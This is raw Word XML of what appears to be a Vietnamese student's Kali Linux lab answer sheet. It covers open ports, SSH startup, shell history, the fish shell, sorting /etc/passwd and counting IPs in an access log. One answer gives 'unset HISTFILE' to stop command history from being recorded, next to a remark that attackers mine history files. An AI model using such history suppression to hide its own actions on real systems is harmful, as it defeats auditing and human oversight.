    <w:p w14:paraId="50C7DF2E" w14:textId="1C9DAF77" w:rsidR="00BE762F" w:rsidRDefault="00BE762F" w:rsidP="00BE762F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A11D4C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CEA5F51" wp14:editId="36577E51">
            <wp:extent cx="3334215" cy="4477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1AE1" w14:textId="77777777" w:rsidR="00A11D4C" w:rsidRPr="00A11D4C" w:rsidRDefault="00A11D4C" w:rsidP="00BE762F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C609A05" w14:textId="77777777" w:rsidR="00BE762F" w:rsidRPr="00A11D4C" w:rsidRDefault="00BE762F" w:rsidP="00BE762F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A6FD760" w14:textId="65965CD8" w:rsidR="00BE762F" w:rsidRPr="00A11D4C" w:rsidRDefault="00BE762F" w:rsidP="007E0474">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A11D4C">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
        </w:rPr>
        <w:t>Liệt kê các port đang được mở trên Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0E3865" w14:textId="77777777" w:rsidR="00A11D4C" w:rsidRPr="00A11D4C" w:rsidRDefault="00A11D4C" w:rsidP="00A11D4C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EDC0573" w14:textId="340883E3" w:rsidR="000055C2" w:rsidRDefault="00080F9B" w:rsidP="00BE762F">
      <w:pPr>
        <w:ind w:left="360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 w:rsidRPr="00080F9B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/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3C09B5DB" wp14:editId="0A6887F9">
            <wp:extent cx="5943600" cy="8655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78E7" w14:textId="2409B1BB" w:rsidR="00A11D4C" w:rsidRDefault="00A11D4C" w:rsidP="00A11D4C">
      <w:pPr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</w:p>
    <w:p w14:paraId="22F40630" w14:textId="069E1C35" w:rsidR="00EE5242" w:rsidRDefault="00EE5242" w:rsidP="00A11D4C">
      <w:pPr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</w:p>
    <w:p w14:paraId="7AACDCA4" w14:textId="77777777" w:rsidR="00EE5242" w:rsidRPr="00A11D4C" w:rsidRDefault="00EE5242" w:rsidP="00A11D4C">
      <w:pPr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</w:p>
    <w:p w14:paraId="6A8E7D2E" w14:textId="5AAFDC3F" w:rsidR="0011575C" w:rsidRDefault="0011575C" w:rsidP="007E0474">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:commentRangeStart w:id="3"/>
      <w:r w:rsidRPr="00F14DD9">
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Tại sao khi kiểm tra dịch vụ SSH có đang chạy hay không (Hình 10), kết quả hiểnthị 2 dòng, trong khi dịch vụ HTTP (Hình 13), kết quả chỉ có 1 dòng</w:t>
      </w:r>
      <w:commentRangeEnd w:id="3"/>
      <w:r w:rsidR="00F14DD9">
        <w:rPr>
          <w:rStyle w:val="CommentReference"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:commentReference w:id="3"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A14BDB" w14:textId="77777777" w:rsidR="001E06D2" w:rsidRPr="00F14DD9" w:rsidRDefault="001E06D2" w:rsidP="007E0474">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F5D1DC6" w14:textId="7403FF95" w:rsidR="0011575C" w:rsidRDefault="00EE5242" w:rsidP="007E0474">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:before="240"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Cambria-Italic" w:cstheme="minorBidi"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00654193">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Cambria-Italic" w:cstheme="minorBidi"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00654193" w:rsidRPr="00654193">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Cambria-Italic" w:cstheme="minorBidi"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>SS</w:t>
      </w:r>
      <w:r w:rsidR="00654193">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Cambria-Italic" w:cstheme="minorBidi"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>HD sử dụng cả hai IPv4 và IPv6 , riêng http chỉ sử dụng IPv6. Sử dụng lệnh netstat sẽ thấy rõ giao thức SSH sử dụng là tcp và tcp6, còn http là tcp6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5870ED5D" w14:textId="77777777" w:rsidR="00654193" w:rsidRPr="00654193" w:rsidRDefault="00654193" w:rsidP="007E0474">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Cambria-Italic" w:cstheme="minorBidi"/>
          <w:i/>
          <w:iCs/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1280168C" w14:textId="6B9FBC0D" w:rsidR="0011575C" w:rsidRDefault="0011575C" w:rsidP="007E0474">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="fontstyle01"/>
        </w:rPr>
        <w:t>Ngăn dịch vụ SSH chạy cùng với hệ thống lúc khởi động.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FE126F" w14:textId="157B5979" w:rsidR="00A11D4C" w:rsidRPr="00A11D4C" w:rsidRDefault="00A11D4C" w:rsidP="00A11D4C">
      <w:pPr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</w:p>
    <w:p w14:paraId="239D8FE4" w14:textId="62BF1732" w:rsidR="0011575C" w:rsidRDefault="0011575C" w:rsidP="00BE762F">
      <w:pPr>
        <w:ind w:left="360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 w:rsidRPr="0011575C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/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31919F3F" wp14:editId="1D3E01A8">
            <wp:extent cx="5943600" cy="598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D578" w14:textId="77777777" w:rsidR="00A11D4C" w:rsidRPr="00A11D4C" w:rsidRDefault="00A11D4C" w:rsidP="00BE762F">
      <w:pPr>
        <w:ind w:left="360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</w:pPr>
    </w:p>
    <w:p w14:paraId="479FBE0A" w14:textId="0D2454B6" w:rsidR="0012011E" w:rsidRDefault="0012011E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t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r w:rsidR="00B20B8B">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w: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t>Lịch sử các lệnh thực ra được lưu trữ ở đâu? Liệt kê các ưu, nhược điểm khi thực</w:t>
      </w:r>
      <w:r w:rsidR="001E06D2">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w: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t>hiện lưu trữ lại các lệnh đã nhập?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B05340" w14:textId="2841677B" w:rsidR="0012011E" w:rsidRDefault="0012011E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Lịch sử lệnh được lưu trữ tại file </w:t>
      </w:r>
      <w:r w:rsidRPr="00A11D4C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>“.zsh_history”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, file này nằm trong thư mục </w:t>
      </w:r>
      <w:r w:rsidRPr="00A11D4C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">home 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và là </w:t>
      </w:r>
      <w:r w:rsidR="00A11D4C" w:rsidRPr="00A11D4C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>hidden file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0238F5AA" w14:textId="77777777" w:rsidR="0012011E" w:rsidRDefault="0012011E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Ưu điểm: History giúp người dùng thao tác với các lệnh đã dùng, và có khả năng tái sử dụng trong tương lai, giúp thao tác nhanh hơn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1137EED8" w14:textId="77777777" w:rsidR="00A11D4C" w:rsidRDefault="0012011E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Khuyết điểm: Song bên cạnh, khi hệ thống bị chiếm quyền điều khiển, </w:t>
      </w:r>
      <w:r w:rsidR="00A11D4C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>attacker có thể vào và xác định được hoạt động trên command của user, từ đó lấy thông tin và tạo ra những vector attack mới</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D971D83" w14:textId="0472F67E" w:rsidR="00E74A76" w:rsidRDefault="0012011E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br/>
        <w:t xml:space="preserve">8. </w:t>
      </w:r>
      <w:r w:rsidR="00B20B8B">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w: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t>Có cách nào để ngăn chặn việc lưu trữ lịch sử lệnh hay không? Nếu có, hãy mô tả</w:t>
      </w:r>
      <w:r w:rsidR="001E06D2">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w: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t>cách làm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D85A8A9" w14:textId="060BE526" w:rsidR="00E74A76" w:rsidRPr="00E74A76" w:rsidRDefault="00E74A76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Tắt history (tạm thời- trong một bash)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B6484B" w14:textId="63B90FE5" w:rsidR="00E74A76" w:rsidRDefault="00E74A76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unset HISTFILE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F0BB86" w14:textId="77777777" w:rsidR="00E74A76" w:rsidRDefault="00E74A76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HISTFILE: var môi trường trỏ đường dẫn đến “.zsh_history” ở trên</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F38C301" w14:textId="19861595" w:rsidR="0012011E" w:rsidRDefault="0012011E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br/>
        <w:t>9.</w:t>
      </w:r>
      <w:r w:rsidR="00B20B8B">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w: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t>Ngoài cách sử dụng tiện ích history expansion, còn cách nào để thực hiện lại các</w:t>
      </w:r>
      <w:r w:rsidRPr="0012011E">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>lệnh đã nhập một cách nhanh chóng hay không? Nếu có, hãy mô tả cách làm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762FD557" w14:textId="62A8F9BA" w:rsidR="00021BDC" w:rsidRDefault="00021BDC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Cài đặt fish : sudo apt install fish </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0781523B" w14:textId="4CF8365E" w:rsidR="00021BDC" w:rsidRDefault="00021BDC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Gõ lệnh fish để vào mode </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694A9960" w14:textId="18265B49" w:rsidR="00021BDC" w:rsidRDefault="00021BDC" w:rsidP="007E0474">
      <w:pPr>
        <w:ind w:left="360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lastRenderedPageBreak/>
        <w:t>Sau đó, khi thực hiện command sẽ tự động recommend autocompletion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674BE417" w14:textId="630CBC4F" w:rsidR="009E5109" w:rsidRPr="003553C8" w:rsidRDefault="009E5109" w:rsidP="007E047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-Italic" w:hAnsi="Cambria-Italic" w:cs="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E5109">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic" w:cs="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>10.</w:t>
      </w:r>
      <w:r w:rsidR="00B20B8B">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic" w:cs="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00B20B8B" w:rsidRPr="003553C8">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic" w:cs="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="003553C8">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic" w:cs="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Như đã biết, khi sử dụng toán tử “&gt;” để xuất kết quả vô tập tin, nếu tập tin đã tồntại, nội dung trong tập tin sẽ bị thay thế bằng nội dung mới. Vậy, có cách nào để</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657A2BF5" w14:textId="77777777" w:rsidR="009E5109" w:rsidRPr="003553C8" w:rsidRDefault="009E5109" w:rsidP="007E047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-Italic" w:hAnsi="Cambria-Italic" w:cs="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003553C8">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic" w:cs="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>hoàn tác lại quá trình này hay không? Nếu có, hãy mô tả cách làm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF53B89" w14:textId="20C28F39" w:rsidR="009E5109" w:rsidRDefault="009E5109" w:rsidP="007E047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 w:cs="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">11. </w:t>
      </w:r>
      <w:r w:rsidR="00B20B8B">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic" w:cs="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic" w:cs="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Sử dụng lệnh cat cùng với lệnh sort để sắp xếp lại nội dung của tập tin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF9AEF7" w14:textId="77777777" w:rsidR="009E5109" w:rsidRDefault="009E5109" w:rsidP="007E047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 w:cs="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>/etc/passwd, sau đó lưu kết quả vào một tập tin mới có tên passwd_new và thực</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1288AD61" w14:textId="7AA10F0B" w:rsidR="009E5109" w:rsidRDefault="009E5109" w:rsidP="007E0474">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both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 w:cs="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>hiện đến số lượng dòng có trong tập tin mới.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCB0BDD" w14:textId="50421CD9" w:rsidR="00B20B8B" w:rsidRDefault="00B20B8B" w:rsidP="007E0474">
      <w:pPr>
        <w:ind w:left="360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B20B8B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043B8A69" wp14:editId="15BB5F42">
            <wp:extent cx="3677163" cy="158137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0F5A" w14:textId="77777777" w:rsidR="00B20B8B" w:rsidRDefault="00B20B8B" w:rsidP="007E0474">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both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 w:cs="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>12. Sử dụng tập tin /etc/passwd, trích xuất tên user và home directory cho tất cả user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1359A1AD" w14:textId="02D6D696" w:rsidR="00B20B8B" w:rsidRDefault="00B20B8B" w:rsidP="007E0474">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both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 w:cs="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>có shell được thiết lập là /usr/sbin/nologin. Lưu ý, chỉ sử dụng 1 dòng lệnh duy nhất. Kết quả xuất ra màn hình như hình dưới.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F2FC75" w14:textId="40796622" w:rsidR="00B20B8B" w:rsidRDefault="00B20B8B" w:rsidP="00B20B8B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 w:rsidRPr="00B20B8B">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic" w:cs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366F260F" wp14:editId="2DA44D6A">
            <wp:extent cx="5943600" cy="3707130"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="7" name="Picture 7" descr="Text&#10;&#10;Screenshot from PDF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Screenshot from PDF fil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02F7" w14:textId="748E84AF" w:rsidR="00C844C7" w:rsidRDefault="00C844C7" w:rsidP="00B20B8B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</w:p>
    <w:p w14:paraId="1A852E4E" w14:textId="460948E9" w:rsidR="00C844C7" w:rsidRDefault="00C844C7" w:rsidP="007E0474">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both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 w:cs="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Sử dụng file đã sort bài trên:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2121F7" w14:textId="7AA3A5A0" w:rsidR="00B20B8B" w:rsidRDefault="00C844C7" w:rsidP="00C844C7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 w:rsidRPr="00C844C7">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic" w:cs="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30410B73" wp14:editId="32D56B12">
            <wp:extent cx="5534797" cy="2705478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D90B" w14:textId="77777777" w:rsidR="00C844C7" w:rsidRDefault="00C844C7" w:rsidP="00C844C7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</w:p>
    <w:p w14:paraId="3AFE6992" w14:textId="77777777" w:rsidR="00C844C7" w:rsidRDefault="00C844C7" w:rsidP="00C844C7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="180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1C4899EB" w14:textId="77777777" w:rsidR="00C844C7" w:rsidRDefault="00C844C7" w:rsidP="00C844C7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="180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301A4B81" w14:textId="0A398B3B" w:rsidR="00C844C7" w:rsidRDefault="00C844C7" w:rsidP="00C844C7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="180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C844C7">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">13. Tải tập tin access_log.txt.gz tại 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   </w:t>
      </w:r>
      <w:r w:rsidR="007E0474">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                                                 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C844C7">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(h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>t</w:t>
      </w:r>
      <w:r w:rsidRPr="00C844C7">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">tps://github.com/blakduk/ahihi/raw/master/access_log.txt.gz), sau đó thực hiện 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                        </w:t>
      </w:r>
      <w:r w:rsidRPr="00C844C7">
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>liệt kê danh sách các địa chỉ IP và số lượng tương ứng, thực hiện sắp xếp giảm dần</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB9AE3E" w14:textId="708972C1" w:rsidR="00C844C7" w:rsidRDefault="00B81FAD" w:rsidP="00B81FAD">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="180"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic" w:cs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 w:cs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2057263D" wp14:editId="71B12679">
            <wp:extent cx="3204210" cy="357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F42E" w14:textId="77777777" w:rsidR="00B81FAD" w:rsidRDefault="00B81FAD" w:rsidP="00B81FAD">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="180"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria-Italic" w:hAnsi="Cambria-Italic" w:cs="Cambria-Italic"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="212120"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
